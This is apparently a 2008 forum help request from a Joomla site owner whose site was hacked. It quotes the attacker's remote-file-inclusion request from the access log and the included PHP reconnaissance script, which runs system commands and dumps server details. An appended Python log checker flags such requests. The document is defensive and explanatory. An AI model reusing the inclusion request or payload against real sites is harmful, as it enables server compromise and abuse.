Hi, my site (Joomla 1.0.15 stable) has been hacked with the following command:
200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"
where urlcrack.txt contains the following text:
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "narasaon
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "narasaon was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;
Thanks to this code, hackers are able to send thousands of emails with our server.
Thanks in advance for any suggestions.
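
An added example, not part of the original post: a log check that flags requests like the one quoted above, where a query-string parameter carries a remote URL (the remote file inclusion pattern). The regexes, function name and all sample lines except the first are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache "combined" access-log format, as in the line quoted in the post.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# A parameter value that *starts* with a URL scheme or PHP stream wrapper.
REMOTE_SCHEME = re.compile(r'^\s*(?:(?:https?|ftps?|php)://|data:)', re.I)
# User agents of scripting libraries (assumed list, extend as needed).
SCRIPTED_UA = re.compile(r'libwww-perl|curl|wget|python-requests', re.I)

def find_rfi_attempts(lines):
    """Return one record per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Split on the first '?' only; trailing '???' stays in the last value.
        _, _, query = m['target'].partition('?')
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double encoding.
            if REMOTE_SCHEME.match(unquote(value)):
                hits.append({
                    'ip': m['ip'], 'time': m['ts'], 'param': name,
                    'value': value, 'status': int(m['status']),
                    # 200 means the request was served, not proof of inclusion.
                    'served': m['status'] == '200',
                    'scripted_ua': bool(SCRIPTED_UA.search(m['ua'])),
                })
    return hits

SAMPLE_LOG = [
    # Line from the post.
    '200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"',
    # Constructed: ordinary page view.
    '192.0.2.10 - - [25/Sep/2008:05:01:12 +0200] "GET /mysitename/index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    # Constructed: percent-encoded variant that was not served.
    '203.0.113.7 - - [25/Sep/2008:05:03:40 +0200] "GET /mysitename/index.php?option=com_comprofiler&user=http%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Hits with `served` set are the ones to trace first. Parameters that legitimately carry a URL (for example a return address after login) will also match and need an allow-list.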